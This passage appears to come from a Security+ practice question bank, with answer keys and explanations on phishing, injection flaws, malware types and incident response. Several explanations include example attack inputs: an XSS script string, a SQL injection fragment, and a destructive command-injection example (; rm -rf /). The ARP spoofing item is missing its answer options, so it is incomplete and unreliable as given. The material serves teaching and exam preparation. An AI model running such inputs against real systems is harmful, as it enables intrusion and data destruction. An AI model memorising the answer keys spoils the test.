Option B is wrong because adware typically displays unwanted advertisements or redirects browser traffic, not renames files or deletes shadow copies; document opening issues here are a symptom of encryption, not adware. Option C is wrong because a rootkit hides its presence and provides privileged access, but using a command-line utility like vssadmin is a common ransomware action, not indicative of rootkit functionality. Option D is wrong because spyware covertly collects user data (keystrokes, browsing habits) without altering files; the attacker renaming and deleting backups points to encryption for ransom, not passive data theft.
A help desk technician receives an SMS claiming to be from the mobile carrier. The message says the user's corporate number will be suspended unless they open a link and confirm an MFA code. The user has not reported any account issues. What attack is this?
A.Spear phishing
B.Smishing
C.Vishing
D.Baiting
AnswerB
Smishing is phishing delivered through SMS, and the attacker is using urgency and a fake carrier notice to steal credentials or MFA codes.
Why this answer
Smishing is a phishing attack conducted via SMS (Short Message Service). The message impersonates the mobile carrier, creates urgency by threatening suspension, and lures the user to a malicious link to capture MFA codes or credentials. Since the attack vector is SMS, not email or voice, this is smishing.
Exam trap
The trap here is confusing the delivery method (SMS vs. email vs. voice) — candidates often pick 'spear phishing' because the message is personalized, but the defining characteristic is the SMS channel, which makes it smishing.
How to eliminate wrong answers
Option A is wrong because spear phishing is a targeted email-based attack that uses personalized information to trick a specific individual, not an SMS message. Option C is wrong because vishing (voice phishing) is conducted over phone calls, not text messages.
A support portal has a search field that accepts customer last names. After a tester enters a single quote, the application returns a database syntax error. Which attack is the tester most likely trying to verify?
A.Cross-site scripting (XSS)
B.SQL injection
C.CSRF
D.SSRF
AnswerB
SQL injection happens when user input is inserted into a database query without proper validation or parameterization. A single quote causing a syntax error is a common sign that the input is affecting the SQL statement.
Why this answer
The tester is most likely trying to verify a SQL injection vulnerability. Entering a single quote into a search field that interacts with a database can break the SQL query syntax if user input is improperly sanitized, causing the database to return a syntax error. This error indicates that the input is being directly concatenated into a SQL statement, confirming the presence of a SQL injection flaw.
Exam trap
The trap here is that candidates may confuse the database syntax error with a client-side script execution indicator, leading them to choose XSS, but the error is a direct result of SQL syntax breakage, not script injection.
How to eliminate wrong answers
Option A is wrong because cross-site scripting (XSS) involves injecting client-side scripts into web pages viewed by other users, and a database syntax error is not a typical indicator of XSS; XSS would manifest as script execution in the browser, not a backend database error. Option C is wrong because Cross-Site Request Forgery (CSRF) exploits the trust a site has in a user's browser by tricking the user into making unintended requests, and a single quote in a search field does not trigger a CSRF attack or produce a database syntax error. Option D is wrong because Server-Side Request Forgery (SSRF) involves manipulating the server to make requests to internal or external resources, and a database syntax error from a single quote is not related to SSRF; SSRF would typically involve URL manipulation or protocol-based attacks.
After an endpoint cleanup, an EDR agent shows inconsistent results: a suspicious process does not appear in normal task listings, a file in System32 is hidden from user-mode tools, and some security logs stop recording events at the same time. Which malware type best matches these symptoms?
A.Rootkit, because it hides processes, files, or activity from standard system tools.
B.Spyware, because it secretly collects user information and browser data.
C.Worm, because it spreads quickly through network shares and email attachments.
D.Trojan, because it masquerades as legitimate software to trick the user.
AnswerA
Rootkits are designed to conceal malware and attacker activity by altering how the operating system reports processes, files, or logs.
Why this answer
A rootkit is designed to hide its presence and the presence of associated processes, files, and system activities from standard operating system tools and user-mode APIs. The symptoms described—a process invisible to task listings, a hidden file in System32, and security logs ceasing to record events—are classic indicators of kernel-mode or user-mode rootkit behavior that intercepts system calls to filter out its own artifacts.
Exam trap
The trap here is that candidates confuse the 'hiding' behavior of a rootkit with the 'deception' of a trojan or the 'collection' of spyware, but only a rootkit specifically subverts the OS's own APIs to conceal its presence from standard administrative tools.
How to eliminate wrong answers
Option B is wrong because spyware focuses on covert data collection (e.g., keystrokes, browsing habits) and does not inherently hide processes, files, or disable security logging. Option C is wrong because a worm's primary characteristic is self-replication and network propagation, not stealth mechanisms to evade detection by task manager or hide files in System32. Option D is wrong because a trojan relies on social engineering to appear legitimate, but its core behavior does not include the systematic hiding of processes and files from system tools or the suppression of security event logs.
After installing a free PDF-to-Word utility from an unofficial website, a user's laptop starts sending data to an unknown server and the security agent is disabled. Which malware type best fits?
A.Trojan
B.Worm
C.Spyware
D.Rootkit
AnswerA
A trojan disguises itself as useful software while secretly installing malicious behavior.
Why this answer
A Trojan is malware disguised as legitimate software, such as a free PDF-to-Word utility, that performs malicious actions without the user's knowledge. In this scenario, the Trojan exfiltrates data to an unknown server and disables the security agent, which are classic Trojan behaviors—unlike self-replicating worms or passive spyware. The user's intentional download from an unofficial website is the typical infection vector for Trojans.
Exam trap
The trap here is that candidates may confuse 'spyware' with 'Trojan' because both can steal data, but the key distinction is that a Trojan actively performs multiple malicious actions (including disabling security) and requires user execution, whereas spyware is typically passive and does not disable defenses.
How to eliminate wrong answers
Option B (Worm) is wrong because worms self-replicate and spread across networks without user interaction, whereas this malware required the user to download and execute the utility. Option C (Spyware) is wrong because spyware primarily passively monitors and collects data without actively disabling security agents or performing destructive actions. Option D (Rootkit) is wrong because rootkits specifically hide their presence by modifying the operating system kernel or drivers, and while disabling a security agent could be a rootkit behavior, the initial infection vector (a downloaded utility) and data exfiltration are more characteristic of a Trojan.
Based on the exhibit, which attack is the developer most likely observing?
A.Cross-site scripting (XSS)
B.Server-side request forgery (SSRF)
C.SQL injection
D.CSRF
AnswerB
The application is being tricked into making a request to an internal metadata endpoint using a user-controlled URL parameter. That is server-side request forgery. SSRF is common in cloud environments because it can expose instance metadata, credentials, or internal services that should not be reachable from the outside.
Why this answer
The developer is most likely observing a server-side request forgery (SSRF) attack because the log shows the application making an outbound HTTP request to an internal IP address (10.0.0.1) initiated by user-supplied input (the 'url' parameter). SSRF occurs when an attacker manipulates the server to send crafted requests to internal or external resources, bypassing access controls. The exhibit's pattern of a server-side request to a private IP range directly indicates SSRF, not client-side or database attacks.
Exam trap
The trap here is that candidates confuse SSRF with CSRF because both involve requests, but SSRF is server-initiated while CSRF is client-initiated; the key clue is the server making a request to a private IP, not the user's browser.
How to eliminate wrong answers
Option A is wrong because cross-site scripting (XSS) involves injecting malicious scripts into web pages viewed by other users, not server-side requests to internal IPs; the log shows no script execution or client-side payload. Option C is wrong because SQL injection targets database queries via input fields, but the log shows an HTTP request to an internal IP, not a database error or query manipulation. Option D is wrong because CSRF (Cross-Site Request Forgery) tricks a user's browser into performing unintended actions on an authenticated site, whereas the exhibit shows the server itself making the request, not the client's browser.
A file-sharing portal uses a download URL like /download?file=12345. A tester changes the value to 12346 and can access another department's document without logging in again. Which control most directly prevents this issue?
A.Implement server-side authorization checks for every object request.
B.Make the identifier longer so users cannot guess nearby values.
C.Move the portal to HTTPS so request parameters cannot be intercepted.
D.Store the document name in a hidden field and validate it in JavaScript.
AnswerA
Server-side authorization ensures the application verifies that the current user is allowed to access the specific object requested. This directly stops insecure direct object reference issues because changing the identifier alone no longer grants access. The check must happen on the server for every request, not in the browser.
Why this answer
The issue is that the server trusts the file identifier in the URL without verifying that the authenticated user is authorized to access the requested resource. Implementing server-side authorization checks for every object request ensures that before serving any file, the server validates whether the current session or user has explicit permission to access that specific document. This directly prevents the IDOR (Insecure Direct Object Reference) vulnerability demonstrated by the tester.
Exam trap
The trap here is that candidates often confuse confidentiality controls (like HTTPS or longer identifiers) with authorization controls, failing to recognize that the core flaw is the lack of server-side permission verification for each object request.
How to eliminate wrong answers
Option B is wrong because making the identifier longer (e.g., using a UUID) only makes guessing harder but does not eliminate the authorization gap; if the server still trusts any identifier without checking permissions, a user who obtains or guesses a valid identifier can still access unauthorized documents. Option C is wrong because HTTPS encrypts the request in transit to prevent interception, but it does not address the server-side authorization flaw; the tester in this scenario is already authenticated and simply changes the parameter value in their own browser. Option D is wrong because storing the document name in a hidden field and validating it in JavaScript is client-side validation, which can be easily bypassed by disabling JavaScript or manipulating the hidden field value using browser developer tools; server-side authorization is required.
An EDR alert shows a finance workstation launching rundll32 from %AppData%, creating a scheduled task, and making repeated HTTPS beacons to a rare domain. The user still has open accounting files, and the SOC wants to slow spread without losing evidence. What two actions should be taken first? Select two.
Select 2 answers
A.Isolate the workstation from the network using EDR or NAC containment.
B.Immediately wipe and reimage the workstation before collecting anything else.
C.Capture volatile evidence such as memory contents, running processes, and active network connections.
D.Power the workstation off immediately to stop the malware process.
E.Disable every user account in the finance department to prevent further compromise.
AnswersA, C
Isolating the host immediately stops most outbound command-and-control traffic and reduces the chance of lateral spread. It is the best first containment step when malware is still active. It preserves the system state better than power loss, which can destroy volatile evidence.
Why this answer
Isolating the workstation (A) stops the malware from communicating with its C2 server via HTTPS beacons and prevents lateral movement, while preserving the evidence on disk. Capturing volatile evidence (C) before any shutdown or isolation ensures that memory-resident artifacts, active network connections, and running processes are preserved, which are critical for forensic analysis and understanding the attack chain.
Exam trap
The trap here is that candidates may choose to power off the workstation (D) thinking it stops the malware, but this destroys volatile evidence and can trigger anti-forensic mechanisms, whereas isolation and memory capture are the correct first steps in incident response.
A customer enters `<script>alert('test')</script>` into a public forum signature field. Later, other users who view that signature see the script execute in their browsers. What attack is this?
A.SQL injection
B.Cross-site scripting
C.Session replay
D.Directory traversal
AnswerB
Cross-site scripting stores or reflects script code that executes in another user's browser.
Why this answer
This is a classic stored cross-site scripting (XSS) attack. The malicious script is injected into a persistent data store (the forum signature field) and later served to other users without proper sanitization, causing the browser to execute the script in the context of the trusted site.
Exam trap
The trap here is confusing client-side injection (XSS) with server-side injection (SQL injection) because both involve untrusted input, but XSS targets the browser's rendering engine while SQL injection targets the database query parser.
How to eliminate wrong answers
Option A is wrong because SQL injection targets database queries by manipulating input to alter SQL commands, not client-side script execution in a user's browser. Option C is wrong because session replay attacks involve capturing and reusing session tokens (e.g., via packet sniffing or XSS), not injecting scripts into a forum signature. Option D is wrong because directory traversal exploits file system paths to access restricted files (e.g., using '../' sequences), not injecting client-side code into web pages.
An employee receives an email that appears to come from payroll and asks them to open a link to "confirm direct deposit details". The link goes to a site with a slightly misspelled company name. What should the employee do first?
A.Click the link and sign in quickly before the account is locked
B.Reply to the email and ask payroll whether the message is real
C.Use the company's known payroll portal or help desk contact to verify the request
D.Forward the message to co-workers so they can compare it with similar emails
AnswerC
Verifying through a trusted, separate channel avoids the suspicious link and helps confirm whether the request is legitimate.
Why this answer
Option C is correct because the safest first step when receiving a suspicious email is to verify its legitimacy through a trusted, independent channel—such as the company's known payroll portal or the help desk. This avoids interacting with the potentially malicious link or sender, which could lead to credential theft or malware installation. The email exhibits classic phishing indicators: a spoofed sender, a request for sensitive action, and a URL with a misspelled domain.
Exam trap
The trap here is that candidates may think replying to the email (Option B) is a safe verification method, but in reality, it engages the attacker and confirms the email address as active, which is a common social engineering tactic.
How to eliminate wrong answers
Option A is wrong because clicking the link and signing in would directly submit credentials to a phishing site, compromising the employee's account. Option B is wrong because replying to the email confirms the employee's address as active and may reach the attacker, not the legitimate payroll department, increasing the risk of targeted follow-up attacks. Option D is wrong because forwarding the message to co-workers could spread the phishing attempt and potentially expose others to the same threat, violating security best practices that require reporting to the security team instead.
A help desk technician receives an email that appears to come from the payroll provider. The message says the employee's direct deposit will be suspended unless they verify their account through a link. What type of attack is this?
A.Phishing
B.Baiting
C.Vishing
D.Pretexting
AnswerA
Correct because the message uses a fake urgent request to steal credentials through a link. It impersonates a trusted organization and pressures the user to act quickly. That combination is a classic phishing pattern, even if the wording seems professional and the logo looks real.
Why this answer
This is a classic phishing attack because the email impersonates a trusted entity (the payroll provider) and uses social engineering to trick the recipient into clicking a malicious link. Phishing specifically involves fraudulent electronic communications, such as email, to deceive victims into revealing sensitive information or installing malware. The attack vector here is email-based, which aligns directly with the definition of phishing in the SY0-701 domain of threats and vulnerabilities.
Exam trap
The trap here is that candidates may confuse phishing with pretexting because both involve deception, but phishing is specifically electronic (email, SMS, or instant message), while pretexting relies on a fabricated story delivered through any medium, often requiring direct interaction.
How to eliminate wrong answers
Option B (Baiting) is wrong because baiting involves offering something enticing (e.g., a free USB drive or download) to lure a victim into a trap, not sending a deceptive email requesting verification. Option C (Vishing) is wrong because vishing uses voice communication (e.g., phone calls or VoIP) to extract information, not email. Option D (Pretexting) is wrong because pretexting involves fabricating a scenario or identity to gain trust and obtain information, often through direct interaction (e.g., a phone call or in-person), not through an unsolicited email with a link.
Based on the exhibit, which indicator should defenders prioritize for detecting future activity from this campaign?
A.The daily-changing domain names used by the campaign.
B.The executable file hash that remains constant across samples.
C.The TLS certificate fingerprint that remains constant across samples.
D.The changing user agent string seen on each host.
AnswerC
A stable TLS certificate fingerprint is a strong indicator because it can survive daily domain changes and still identify the same infrastructure or campaign. It is especially useful for network detection when other indicators rotate frequently, as shown in the exhibit.
Why this answer
Option C is correct because a TLS certificate fingerprint that remains constant across samples provides a stable, attacker-controlled indicator that is difficult for adversaries to change without incurring cost or operational friction. Unlike domain names or user agents, which can be rotated easily, TLS certificates require the attacker to generate or compromise a new private key and certificate, making the fingerprint a persistent and reliable detection signature for defenders.
Exam trap
The trap here is that candidates mistakenly prioritize easily changed artifacts like file hashes or domain names, overlooking the operational friction that makes TLS certificate fingerprints a more stable and attacker-resistant indicator.
How to eliminate wrong answers
Option A is wrong because daily-changing domain names are designed to evade domain-based blocklists and are inherently unstable as indicators; defenders would struggle to keep up with the rapid rotation. Option B is wrong because while an executable file hash may remain constant across samples, it can be trivially altered by recompiling or appending junk data to the binary, making it a weak long-term indicator. Option D is wrong because user agent strings are easily spoofed or randomized by the malware, and they often vary per host or session, providing no reliable consistency for detection.
Users on the same VLAN report that their browser occasionally reaches a fake internal portal, and packet captures show one host sending forged ARP replies that claim to be the default gateway. Traffic from nearby systems begins flowing through that host. Which attack is occurring?
ARP spoofing, also called ARP poisoning, uses false ARP messages to bind the attacker's MAC address to the gateway IP address and redirect local traffic.
Why this answer
B is correct because the scenario describes ARP spoofing (also known as ARP poisoning). The attacker sends forged ARP replies to associate their MAC address with the default gateway's IP address, causing traffic from other hosts on the same VLAN to be redirected through the attacker's machine. This allows the attacker to intercept, modify, or redirect traffic to a fake internal portal, which is a classic man-in-the-middle (MITM) attack leveraging the stateless nature of ARP.
Exam trap
The trap here is that candidates confuse ARP spoofing with DNS poisoning because both can redirect traffic to a fake portal, but the key differentiator is the protocol layer: ARP operates at Layer 2 (MAC address manipulation) while DNS operates at Layer 7 (name resolution).
How to eliminate wrong answers
Option A is wrong because DNS poisoning involves corrupting DNS resolver caches or zone data to redirect domain names to malicious IPs, but the packet captures show forged ARP replies, not DNS queries or responses. Option C is wrong because MAC flooding overwhelms a switch's CAM table with fake MAC addresses to force it into fail-open mode (hub-like behavior), but the attack here is targeted and uses spoofed ARP replies, not flooding. Option D is wrong because a SYN flood is a denial-of-service (DoS) attack that exhausts server resources by sending incomplete TCP handshake requests; it does not involve ARP manipulation or traffic redirection.
An accounts payable specialist receives a reply inside an existing vendor email thread. The message uses the real invoice number, matches the vendor's usual tone, and asks the specialist to change payment instructions to a new bank account before the end of the day. The vendor later confirms its mailbox was compromised. What type of attack is most likely?
A.Spear phishing, because the attacker targeted one employee with a convincing message.
B.Business email compromise through conversation hijacking, because the attacker used a compromised mailbox to alter a trusted thread.
C.Baiting, because the attacker tried to tempt the user with urgency and financial pressure.
D.Vishing, because the attacker is trying to persuade the user to change banking details.
AnswerB
This is best described as business email compromise via conversation hijacking. The attacker did not just spoof a sender; they gained access to a real vendor mailbox and inserted fraudulent payment instructions into an existing thread. That makes the message much more believable, often bypassing simple awareness checks. The key clues are the real invoice number, familiar tone, and later confirmation of mailbox compromise.
Why this answer
This is a business email compromise (BEC) attack specifically using conversation hijacking. The attacker gained access to the vendor's legitimate email account and inserted a fraudulent reply into an existing, trusted email thread, leveraging the compromised mailbox to bypass the specialist's suspicion. This differs from standard spear phishing because the attacker did not craft a new email from a spoofed address but instead hijacked an ongoing, authenticated conversation.
Exam trap
CompTIA often tests the distinction between spear phishing (a crafted email from a fake sender) and BEC conversation hijacking (using a compromised legitimate account to reply within an existing thread), where candidates mistakenly choose spear phishing because they focus on the targeted nature of the attack rather than the method of compromise.
How to eliminate wrong answers
Option A is wrong because spear phishing involves sending a crafted email from a spoofed or lookalike domain to a specific target, not hijacking an existing thread from a compromised legitimate mailbox. Option C is wrong because baiting relies on offering something enticing (e.g., a free USB drive) to trick the user, not on urgency or financial pressure within a compromised email thread. Option D is wrong because vishing (voice phishing) uses phone calls or voice messages to deceive the target, not email-based manipulation of a trusted conversation.
A scan reports a critical remote code execution vulnerability on an internet-facing VPN appliance with public proof-of-concept exploit code available. It also reports a critical local privilege escalation on an isolated lab workstation. Patch windows are limited this week. Which should be remediated first?
A.The internet-facing VPN appliance because it has higher exposure and exploitability.
B.The isolated lab workstation because all critical findings must be patched in numerical order.
C.The internal printer because peripheral devices are often overlooked and therefore most dangerous.
D.The lab workstation because local privilege escalation is always more dangerous than remote code execution.
AnswerA
An externally reachable device with a known exploit and remote code execution risk presents a much larger immediate threat than an isolated lab workstation. Prioritization should consider exposure, exploit maturity, and business impact, not severity score alone. Because the VPN appliance is publicly reachable, compromise could lead directly to remote access into the environment and broader organizational impact.
Why this answer
The internet-facing VPN appliance presents a higher risk because it is exposed to the public internet and has a known remote code execution vulnerability with public exploit code. This combination of high exposure (attack surface) and high exploitability (availability of proof-of-concept code) significantly increases the likelihood of a successful attack, making it the priority for remediation despite limited patch windows.
Exam trap
The trap here is that candidates may assume all critical vulnerabilities are equal and must be patched in order of severity score, ignoring the critical factor of asset exposure and the presence of public exploit code, which dramatically increases the real-world risk.
How to eliminate wrong answers
Option B is wrong because patching in numerical order is not a valid security prioritization method; risk-based prioritization (e.g., CVSS score combined with environmental factors like exposure) is the correct approach. Option C is wrong because the internal printer is not mentioned in the scan report, and introducing an unlisted asset distracts from the actual findings; peripheral devices are not inherently more dangerous than a critical RCE on an internet-facing system. Option D is wrong because local privilege escalation is not always more dangerous than remote code execution; RCE on an internet-facing device allows an attacker to gain initial access from anywhere, while local privilege escalation requires existing access to the isolated lab workstation, which is already low risk due to network isolation.
A developer reports that a search field returns all customer records when they enter a single quote followed by OR 1=1. Security confirms the web app concatenates user input directly into SQL statements. Which remediation is best?
A.Deploy only a web application firewall and keep the code unchanged.
B.Use parameterized queries or prepared statements in the application code.
C.Store the database password as a salted hash in the application configuration.
D.Disable HTTPS so the request body is easier to inspect by network tools.
AnswerB
Parameterized queries separate code from user-supplied data, which prevents injected input from being interpreted as SQL instructions. That directly addresses the flaw described in the scenario and is the most reliable long-term fix. It also scales better than trying to block every malicious pattern with filtering or a perimeter tool. In secure development, fixing the query construction is preferred because it removes the root cause instead of only reducing symptoms at the edge.
Why this answer
Option B is correct because parameterized queries or prepared statements separate SQL logic from user input, preventing the concatenation that allows SQL injection. By using placeholders (e.g., `?` or `:param`) and binding user input as data, the database engine treats the single quote and `OR 1=1` as literal string values, not executable SQL code. This directly remediates the root cause—dynamic SQL construction—without relying on external filters or insecure workarounds.
Exam trap
The trap here is that candidates may think a WAF (Option A) is sufficient because it blocks common payloads like `' OR 1=1`, but the exam emphasizes that security must be implemented at the code level, not just at the network perimeter.
How to eliminate wrong answers
Option A is wrong because a web application firewall (WAF) only filters known attack patterns and can be bypassed with obfuscation or novel payloads; it does not fix the insecure code, leaving the application vulnerable to SQL injection variants. Option C is wrong because storing the database password as a salted hash in the configuration is irrelevant—passwords are used for authentication, not for preventing SQL injection, and hashing a password would make it unusable for database login. Option D is wrong because disabling HTTPS exposes the entire request body in plaintext, increasing the risk of eavesdropping and session hijacking, and does nothing to prevent SQL injection.
A VPN concentrator shows that an authentication request from a user was accepted twice, even though the user insists they approved only one login. Packet analysis reveals that the second successful attempt reused the same authentication blob and arrived shortly after the first. Which attack is the best fit?
A.Replay attack, because a captured valid authentication message was resent to gain access again.
B.ARP poisoning, because the attacker redirected traffic by altering local address resolution.
C.Phishing, because the user was tricked into entering credentials on a fake page.
D.Denial of service, because the attacker is overwhelming the VPNgateway with requests.
AnswerA
Replay attacks work by capturing a legitimate authentication message and submitting it later, often before it expires or is invalidated.
Why this answer
The scenario describes a captured authentication blob being reused to gain a second successful authentication. This is the hallmark of a replay attack, where an attacker intercepts a valid authentication message (e.g., a Kerberos TGT, RADIUS Access-Accept, or a VPN pre-shared key hash) and retransmits it to the VPN concentrator to impersonate the user. The VPN concentrator accepted the duplicate because it lacked proper replay protection mechanisms such as timestamps, sequence numbers, or one-time-use nonces.
Exam trap
The trap here is confusing a replay attack with a phishing attack, because both involve capturing authentication data, but replay attacks reuse the captured blob directly without tricking the user, while phishing requires the user to voluntarily submit credentials.
How to eliminate wrong answers
Option B is wrong because ARP poisoning involves manipulating ARP tables to redirect traffic on a local network, not reusing an authentication blob to bypass VPN authentication. Option C is wrong because phishing tricks a user into revealing credentials on a fake page, but here the attacker reused a captured authentication blob without needing the user's credentials. Option D is wrong because a denial of service attack aims to overwhelm the VPN gateway with requests to disrupt service, not to gain unauthorized access by replaying a single authentication message.
A SOC analyst reviews an EDR alert on a finance workstation. The alert shows powershell.exe launched with an encoded command, downloaded a payload into memory, and then spawned rundll32.exe. No new executable was written to disk, but the process later created a scheduled task for persistence. Which two findings most strongly support a fileless attack? Select two.
Select 2 answers
A.powershell.exe launched with an encoded command and executed the payload in memory
B.rundll32.exe was spawned by a script-based process during the attack chain
C.a new portable executable was written to the user's temporary folder before being run
D.the endpoint antivirus quarantined the payload after a signature match
E.a USB storage device was inserted shortly before the alert fired
AnswersA, B
Encoded PowerShell is a common fileless technique because the malicious instructions can be hidden inside a command line and run directly in memory. This reduces obvious disk artifacts and can bypass simple file-based detection. In a Security+ scenario, that combination strongly suggests living-off-the-land abuse rather than a traditional dropped executable.
Why this answer
Option A is correct because executing a PowerShell encoded command that downloads and runs a payload entirely in memory, without writing to disk, is a hallmark of fileless malware. This technique avoids traditional file-based detection by leveraging PowerShell's ability to load and execute scripts directly in memory, bypassing disk-based antivirus scans.
Exam trap
The trap here is that candidates may confuse fileless attacks with any attack that uses PowerShell or scripting, but the key distinction is the absence of writing any executable to disk, which is why options involving disk writes or signature-based quarantine are distractors.
A user's laptop suddenly starts renaming many files and showing a ransom note. The laptop is still connected to Wi-Fi. What is the best immediate action?
A.Reboot the laptop to stop the malicious process.
B.Disconnect the laptop from the network immediately.
C.Delete the ransom note and continue working.
D.Change the user's password and wait for more details.
AnswerB
This limits spread to shared systems and helps contain the suspected ransomware activity quickly.
Why this answer
Option B is correct because ransomware actively encrypts files and may communicate with a command-and-control (C2) server over the network to exfiltrate data or receive encryption keys. Disconnecting the Wi-Fi immediately stops further C2 communication, prevents lateral movement to other devices, and halts any ongoing data exfiltration. This containment step is critical before any remediation like system imaging or forensic analysis.
Exam trap
The trap here is that candidates may think rebooting (Option A) will stop the malicious process, but ransomware often persists across reboots via registry run keys or scheduled tasks, and the immediate priority is containment by disconnecting the network.
How to eliminate wrong answers
Option A is wrong because rebooting the laptop may allow the ransomware to continue its encryption process on startup or trigger additional payloads, and it does not stop network-based propagation or C2 communication. Option C is wrong because deleting the ransom note does not reverse file encryption or stop the malicious process; the ransomware remains active and can continue encrypting or spreading. Option D is wrong because changing the user's password does not affect the running ransomware process, and waiting for more details allows the attack to progress, potentially encrypting more files or spreading to other systems.
A security analyst is reviewing the source code of a custom web application. The application receives JSON data from users, which includes a 'type' field. The application uses the 'type' field to determine which Java class to instantiate, and then calls a method on that object. The application does not validate or sanitize the 'type' field. An attacker sends a crafted JSON payload that causes the application to instantiate an unexpected class, leading to remote code execution. Which type of vulnerability does this example describe?
A.SQL injection
B.Cross-site scripting (XSS)
C.Insecure deserialization
D.Directory traversal
AnswerC
Correct. Insecure deserialization occurs when an application deserializes untrusted data, allowing an attacker to control serialized objects or, as in this case, the class name to be instantiated. This can lead to remote code execution, denial of service, or privilege escalation.
Why this answer
Option C is correct because the application deserializes untrusted JSON data and uses the 'type' field to dynamically instantiate a Java class without validation. This is a classic insecure deserialization vulnerability, where an attacker can supply a malicious class name (e.g., a gadget class like `Runtime` or a custom class) that, when instantiated and its method called, executes arbitrary code on the server. The lack of input sanitization on the 'type' field directly enables remote code execution via object instantiation.
Exam trap
The trap here is that candidates may confuse insecure deserialization with injection attacks (SQLi or XSS) because the attacker is 'injecting' a class name, but the core mechanism is the unsafe deserialization of untrusted data to instantiate objects, not injecting code into a query or script context.
How to eliminate wrong answers
Option A is wrong because SQL injection involves injecting malicious SQL queries into input fields that are concatenated into database queries, not dynamically instantiating classes from JSON data. Option B is wrong because cross-site scripting (XSS) involves injecting client-side scripts (e.g., JavaScript) into web pages viewed by other users, not server-side object instantiation leading to remote code execution.
A remote user's laptop begins launching a legitimate-looking "System Update" application at login. After the update window appears, the browser homepage changes, outbound traffic increases, and the user later reports that saved passwords are being used in unauthorized logins. Which malware type is the most likely primary infection?
A.Worm, because it is spreading automatically to nearby systems on the network.
B.Trojan, because it is disguised as a harmless utility while delivering malicious payloads.
C.Ransomware, because files would be encrypted and a payment demand would appear.
D.Rootkit, because the malware is hiding its own presence by modifying kernel behavior.
AnswerB
A trojan commonly masquerades as a legitimate application, then installs or runs additional malicious functions such as credential theft and persistence.
Why this answer
Option B is correct because the malware is disguised as a legitimate 'System Update' application, which is the classic behavior of a Trojan. Trojans rely on social engineering to trick users into executing them, and once activated, they can deliver secondary payloads such as password stealers, browser hijackers, or backdoors. In this scenario, the Trojan likely installed a keylogger or credential harvester to exfiltrate saved passwords, changed browser settings via registry or configuration file manipulation, and increased outbound traffic to a command-and-control (C2) server.
Exam trap
The trap here is that candidates may confuse the visible symptoms (browser change, increased traffic) with a worm's network propagation or a rootkit's stealth, but the key indicator is the social engineering disguise of the 'System Update' application, which is the hallmark of a Trojan.
How to eliminate wrong answers
Option A is wrong because a worm spreads autonomously across networks without user interaction, often exploiting vulnerabilities like SMB or RDP, whereas this infection required the user to execute the fake update at login. Option C is wrong because ransomware typically encrypts files and displays a ransom note, but the symptoms here (browser homepage change, increased traffic, stolen passwords) indicate data theft and persistence, not file encryption. Option D is wrong because a rootkit hides its presence by modifying kernel or system call tables (e.g., SSDT hooking), but the described behavior involves visible changes (homepage alteration, password theft) and no mention of stealth or kernel-level concealment.
Based on the exhibit, what is the BEST remediation for the application flaw shown?
A user-controlled parameter is being passed to a shell command on the server. The application is intended to test connectivity to approved internal hosts only.
A.Keep the current shell command, but add HTML encoding to the response page.
B.Replace the shell call with a safe library function and strictly allowlist approved host values.
C.Increase the web server timeout so the ping utility has more time to complete.
D.Require users to authenticate before they can access the page.
AnswerB
The flaw is server-side command injection caused by passing user input into a shell. A safe library call removes shell interpretation, and an allowlist limits inputs to known-good targets.
Why this answer
Option B is correct because the application flaw is command injection: a user-controlled parameter is passed directly to a shell command (e.g., `ping`). The best remediation is to replace the shell call with a safe library function (e.g., `InetAddress.isReachable()` in Java or a dedicated ICMP library) and strictly allowlist approved internal host values, eliminating the possibility of injecting arbitrary commands like `; rm -rf /`.
Exam trap
The trap here is that candidates often confuse command injection with cross-site scripting (XSS) and choose HTML encoding (Option A), or they mistakenly think authentication (Option D) or timeout adjustments (Option C) can fix a code-level injection vulnerability.
How to eliminate wrong answers
Option A is wrong because HTML encoding the response does not prevent the shell command from executing with malicious input; it only mitigates reflected XSS, not command injection. Option C is wrong because increasing the web server timeout does not address the injection vulnerability; it only changes the execution window for the ping utility, leaving the flaw exploitable. Option D is wrong because requiring authentication does not prevent an authenticated user from injecting commands; it only adds a login gate, not input validation or safe execution.
A customer portal has a form that submits a money-transfer request with the user’s existing session cookie. Security testing shows that if a user visits a malicious site while logged in, the portal will submit the transfer request without any additional verification. Which control would best reduce this risk?
A.Replace the transfer form with a stored procedure
B.Add a server-validated anti-CSRF token to each state-changing request
C.Enable input length limits on the transfer amount field
D.Turn on content security policy to block all script execution
AnswerB
An anti-CSRF token is the best control because it ties the request to the legitimate application session and makes it difficult for an attacker-controlled site to forge the request successfully. State-changing actions such as transfers should validate a unique token on the server side, ideally with other browser protections like SameSite cookies. This directly addresses cross-site request forgery.
Why this answer
The described attack is a Cross-Site Request Forgery (CSRF), where a malicious site forces an authenticated user's browser to submit a state-changing request without the user's consent. Adding a server-validated anti-CSRF token ensures that each request includes a unique, unpredictable value tied to the user's session, which the server verifies before processing. This prevents the malicious site from forging a valid request because it cannot guess or obtain the token.
Exam trap
The trap here is that candidates may confuse CSRF with XSS or session hijacking, and incorrectly choose input validation or stored procedures, not realizing that the core vulnerability is the lack of origin verification for state-changing requests.
How to eliminate wrong answers
Option A is wrong because replacing the transfer form with a stored procedure addresses database injection or logic issues, not the lack of request origin verification; a stored procedure does not prevent a malicious site from submitting a forged request with the user's session cookie. Option C is wrong because input length limits on the transfer amount field only restrict the size of the input data, which does nothing to verify that the request originated from the legitimate portal rather than a cross-site source.
NetFlow shows one workstation opening SMB connections to a dozen internal servers and then attempting many WinRM connections. What is the most likely explanation?
A.The host is likely being used for lateral movement or internal reconnaissance.
B.The workstation is probably downloading a routine operating system update.
C.The network is likely suffering from a wireless interference problem.
D.The user is likely printing documents to multiple shared printers.
AnswerA
That pattern suggests a compromised system probing nearby hosts and trying to spread access.
Why this answer
SMB connections to many internal servers followed by WinRM attempts is a classic pattern of lateral movement or internal reconnaissance. An attacker or compromised host uses SMB to probe for accessible shares and then leverages WinRM for remote command execution, which is a common technique in post-exploitation frameworks like PsExec or CrackMapExec.
Exam trap
The trap here is that candidates may mistake the SMB traffic for normal file sharing or printing, overlooking that WinRM is a remote execution protocol, not a file or print service, and thus the combination signals active reconnaissance or lateral movement.
How to eliminate wrong answers
Option B is wrong because routine OS updates use Windows Update (HTTP/S to Microsoft servers), not SMB connections to internal servers followed by WinRM. Option C is wrong because wireless interference would cause connectivity issues, not a specific pattern of SMB then WinRM traffic. Option D is wrong because printing to shared printers uses SMB for print spooling but does not involve WinRM connections, which are for remote management and command execution.
